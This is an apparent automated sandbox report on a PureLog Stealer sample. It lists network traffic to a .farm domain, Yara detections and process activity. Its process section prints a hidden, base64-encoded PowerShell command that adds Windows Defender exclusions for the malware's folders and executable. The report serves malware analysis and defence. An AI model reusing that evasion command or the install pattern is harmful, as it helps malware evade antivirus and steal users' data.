                          06/17/24-16:18:42.601428TCP2020482ET CURRENT_EVENTS DRIVEBY GENERIC ShellExecute in Hex No Seps44349731188.114.96.3192.168.2.4

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jun 17, 2024 16:18:41.001208067 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:41.001266956 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.001329899 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:41.044262886 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:41.044298887 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.664727926 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.664844036 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:41.668445110 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:41.668497086 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.668910980 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.729975939 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:41.758552074 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:41.804507971 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.893158913 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.893233061 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.893282890 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.893317938 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:41.893337965 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.893354893 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.893390894 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:41.893486023 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.893534899 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.893562078 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:41.893582106 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.893629074 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:41.893639088 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:41.941934109 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.009377956 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.009463072 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.009500980 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.009516001 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.009543896 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.009589911 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.009598970 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.009861946 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.009917021 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.009922028 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.009938955 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.009977102 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.010402918 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.010492086 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.010529041 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.010529995 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.010543108 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.010586977 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.011332035 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.011710882 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.011755943 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.011771917 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.011842012 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.011885881 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.011887074 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.011899948 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.011949062 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.011956930 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.012551069 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.012600899 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.012615919 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.066966057 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.125917912 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.126000881 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.126044035 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.126072884 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.126121998 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.126178980 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.126195908 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.126399994 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.126441956 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.126446962 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.126461029 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.126521111 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.126528025 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.127085924 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.127129078 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.127131939 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.127141953 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.127188921 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.127943039 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.128002882 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.128766060 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.128822088 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.128832102 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.128897905 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.128953934 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.128962040 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.129009962 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.129703999 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.129772902 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.130559921 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.130614996 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.130624056 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.130635023 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.130659103 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.131438971 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.131495953 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.131504059 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.131552935 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.132299900 CEST44349731188.114.96.3192.168.2.4
                          Jun 17, 2024 16:18:42.132363081 CEST49731443192.168.2.4188.114.96.3
                          Jun 17, 2024 16:18:42.133136988 CEST44349731188.114.96.3192.168.2.4

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jun 17, 2024 16:18:40.972147942 CEST6317953192.168.2.41.1.1.1
                          Jun 17, 2024 16:18:40.995023966 CEST53631791.1.1.1192.168.2.4
                          Jun 17, 2024 16:18:58.221488953 CEST5377353192.168.2.41.1.1.1
                          Jun 17, 2024 16:18:58.263545990 CEST53537731.1.1.1192.168.2.4
                          Jun 17, 2024 16:19:02.075139046 CEST53611781.1.1.1192.168.2.4

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jun 17, 2024 16:18:40.972147942 CEST192.168.2.41.1.1.10xbfb9Standard query (0)f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmA (IP address)IN (0x0001)false
                          Jun 17, 2024 16:18:58.221488953 CEST192.168.2.41.1.1.10xf997Standard query (0)1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jun 17, 2024 16:18:40.995023966 CEST1.1.1.1192.168.2.40xbfb9No error (0)f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm188.114.96.3A (IP address)IN (0x0001)false
                          Jun 17, 2024 16:18:40.995023966 CEST1.1.1.1192.168.2.40xbfb9No error (0)f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm188.114.97.3A (IP address)IN (0x0001)false
                          Jun 17, 2024 16:18:58.263545990 CEST1.1.1.1192.168.2.40xf997No error (0)1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm77.221.140.76A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm

                          Statistics

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:10:18:40
                          Start date:17/06/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0xdf0000
                          File size:7'168 bytes
                          MD5 hash:AF4A6267CE7F24818FEEB7D2D62E72C2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1821399208.0000000009650000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1763526633.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1808267831.0000000008F40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1783529566.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1784663616.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1818030083.00000000094C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1830742150.000000000B070000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1763526633.0000000003526000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1824447213.000000000A088000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1767868411.0000000005266000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:1
                          Start time:10:18:45
                          Start date:17/06/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:2
                          Start time:10:18:45
                          Start date:17/06/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:3
                          Start time:10:18:45
                          Start date:17/06/2024
                          Path:C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe
                          Imagebase:0xea0000
                          File size:7'168 bytes
                          MD5 hash:AF4A6267CE7F24818FEEB7D2D62E72C2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1869188121.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000003.00000002.1869188121.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 13%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:4
                          Start time:10:18:52
                          Start date:17/06/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Imagebase:0xd30000
                          File size:42'064 bytes
                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2976520133.000000000309D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.3095261684.0000000007491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2976520133.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.3019858995.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3019858995.0000000004659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3019858995.0000000004058000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate
                          Has exited:false

                          General

                          Target ID:6
                          Start time:10:18:53
                          Start date:17/06/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:7
                          Start time:10:18:54
                          Start date:17/06/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:11
                          Start time:10:19:02
                          Start date:17/06/2024
                          Path:C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe
                          Imagebase:0x510000
                          File size:7'168 bytes
                          MD5 hash:E8CE921868FE7C47FD2C236555EE5BFD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000002.2160867351.0000000006470000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2048354854.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2167920075.0000000007520000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000002.1995844689.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2219301967.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1995844689.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          Disassembly

                          No disassembly